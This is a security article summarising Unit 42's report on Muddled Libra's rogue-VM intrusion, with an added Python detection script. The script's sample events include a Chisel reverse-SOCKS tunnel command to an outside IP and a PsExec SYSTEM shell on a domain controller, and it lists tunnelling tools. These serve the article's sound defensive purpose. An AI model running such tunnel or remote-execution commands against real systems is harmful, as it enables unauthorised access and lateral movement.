unit42.paloaltonetworks.com 2/10/2026, 11:35:46 PM

A Peek Into Muddled Libra’s Operational Playbook

Unit 42 reports that during a September 2025 incident response investigation it uncovered a rogue virtual machine in a targeted environment, and that the artifacts left on it shed light on the operational playbook of the cybercrime group Muddled Libra (also tracked as Scattered Spider and UNC3944).

The investigation found that the VM was created after the group gained unauthorized access to the target's VMware vSphere environment, and that it served as the staging point for early attack activity: reconnaissance, tool download, and persistence through a command-and-control (C2) channel. Attacker activity also included using stolen certificates to forge tickets, copying files from the rogue VM to the domain controller, and interacting with the target's Snowflake infrastructure.

The analysis details a rapid sequence of techniques: creating a beachhead VM, logging in with a newly created local account, deploying Chisel (a TCP/UDP tunnelling tool that carries its connections over HTTP and secures them with the SSH protocol), and then moving laterally across multiple compromised accounts with the help of various open-source tools and Microsoft Sysinternals utilities. Defences highlighted include strong identity security, strict access controls, and ongoing monitoring for living-off-the-land behaviours.
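
As a concrete illustration of the monitoring the defences above call for, the following is an added example (not code from Unit 42, CyberSIXT or the original article) that correlates a VM creation recorded by vCenter with follow-on activity on that new host: a newly created local account, an interactive logon, a tunnelling tool such as Chisel, and Sysinternals utilities. The events, host names, user names and the simplified VmCreatedEvent rendering are constructed for this example; the Windows Security event IDs (4720, 4624, 4688) are real, while the tool-name lists are illustrative assumptions rather than a complete catalogue.

```python
"""Correlate rogue-VM beachhead indicators across vSphere and Windows telemetry."""
from datetime import datetime, timedelta
from typing import Optional

# Constructed sample events for illustration only (not telemetry from the Unit 42 case).
# Windows events use real Security log IDs (4720 account created, 4624 logon,
# 4688 process creation); the vCenter record is a simplified rendering of a
# VmCreatedEvent. Host, user and VM names are hypothetical.
SAMPLE_EVENTS = [
    {"ts": "2025-09-10T02:14:05Z", "source": "vcenter", "type": "VmCreatedEvent",
     "vm": "WIN-UTIL01", "user": "VSPHERE.LOCAL\\svc-backup"},
    {"ts": "2025-09-10T02:20:41Z", "source": "windows", "host": "WIN-UTIL01",
     "event_id": 4720, "target_user": "helpdesk2", "target_domain": "WIN-UTIL01"},
    {"ts": "2025-09-10T02:21:03Z", "source": "windows", "host": "WIN-UTIL01",
     "event_id": 4624, "logon_type": 10, "target_user": "helpdesk2"},
    {"ts": "2025-09-10T02:25:17Z", "source": "windows", "host": "WIN-UTIL01",
     "event_id": 4688, "image": "C:\\Users\\Public\\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.5:8080 R:socks"},
    {"ts": "2025-09-10T02:30:00Z", "source": "windows", "host": "WIN-UTIL01",
     "event_id": 4688, "image": "C:\\Tools\\PsExec64.exe",
     "cmdline": "PsExec64.exe -accepteula \\\\DC01 -s cmd.exe"},
    # Benign noise: a domain account created on another host, hours later, with no VM creation.
    {"ts": "2025-09-10T09:00:00Z", "source": "windows", "host": "FILESRV01",
     "event_id": 4720, "target_user": "svc-print", "target_domain": "CORP"},
]

# Illustrative (assumed) tool lists; a production rule would be broader and tuned.
TUNNEL_TOOLS = {"chisel.exe", "chisel", "ngrok.exe", "plink.exe"}
SYSINTERNALS = {"psexec.exe", "psexec64.exe", "procdump.exe", "procdump64.exe", "adexplorer.exe"}


def _parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process(event: dict) -> Optional[str]:
    """Map a 4688 process-creation event to an indicator class, or None if unremarkable."""
    image = _basename(event.get("image", ""))
    if image in TUNNEL_TOOLS:
        return "tunnel_tool"
    if image in SYSINTERNALS:
        return "sysinternals"
    return None


def find_beachhead_vms(events: list, window_minutes: int = 60) -> list:
    """For each VM created in vCenter, look for hands-on-keyboard indicators on that
    host within the window and report VMs showing at least two distinct classes."""
    window = timedelta(minutes=window_minutes)
    findings = []
    for created in (e for e in events if e.get("type") == "VmCreatedEvent"):
        start = _parse_ts(created["ts"])
        indicators = {}
        for e in events:
            if e.get("source") != "windows" or e.get("host") != created["vm"]:
                continue
            if not start <= _parse_ts(e["ts"]) <= start + window:
                continue
            kind = None
            if e["event_id"] == 4720 and e.get("target_domain") == e["host"]:
                kind = "new_local_account"          # local (not domain) account on the new VM
            elif e["event_id"] == 4624 and e.get("logon_type") == 10:
                kind = "interactive_remote_logon"   # RemoteInteractive logon onto the fresh VM
            elif e["event_id"] == 4688:
                kind = classify_process(e)
            if kind:
                indicators.setdefault(kind, []).append(e["ts"])
        if len(indicators) >= 2:
            findings.append({"vm": created["vm"], "created_by": created["user"],
                             "created_at": created["ts"], "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in find_beachhead_vms(SAMPLE_EVENTS):
        print(f"Suspected beachhead VM {f['vm']} created by {f['created_by']} at {f['created_at']}")
        for kind, times in f["indicators"].items():
            print(f"  {kind}: {len(times)} event(s)")
```

The local-account test (4720 with the target domain equal to the host name) is what separates a rogue local login from routine domain provisioning, and the two-class threshold keeps a lone PsExec run from firing on its own. Note that 4688 only appears when process-creation auditing is enabled, and the command line is only recorded when command-line inclusion is switched on as well; without both, the tunnelling indicator here would be invisible.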

The piece presents a rare window into Muddled Libra’s TTPs through forensic artifacts and logs from the rogue VM, underscoring the value of visibility and disciplined access management in defending cloud and on‑prem environments.

Article by CyberSIXT